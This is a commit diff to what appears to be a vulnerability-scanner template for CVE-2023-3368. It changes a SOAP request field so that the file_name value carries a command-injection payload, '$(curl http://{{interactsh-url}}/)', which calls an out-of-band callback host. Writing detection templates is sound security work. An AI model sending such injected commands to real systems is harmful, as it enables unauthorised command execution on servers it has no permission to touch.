feat: add protocol to interactsh URL (CVE-2023-3368)
Signed-off-by: Dwi Siswanto <me@dw1.io>patch-1
parent
b8f596bed9
commit
4e3b443e79
|
@ -46,7 +46,7 @@ http:
|
|||
</item>
|
||||
<item>
|
||||
<key xsi:type="xsd:string">file_name</key>
|
||||
<value xsi:type="xsd:string">$(curl {{interactsh-url}})</value>
|
||||
<value xsi:type="xsd:string">$(curl http://{{interactsh-url}}/)</value>
|
||||
</item>
|
||||
<item>
|
||||
<key xsi:type="xsd:string">service_ppt2lp_size</key>
|
||||
|
|
Loading…
Reference in New Issue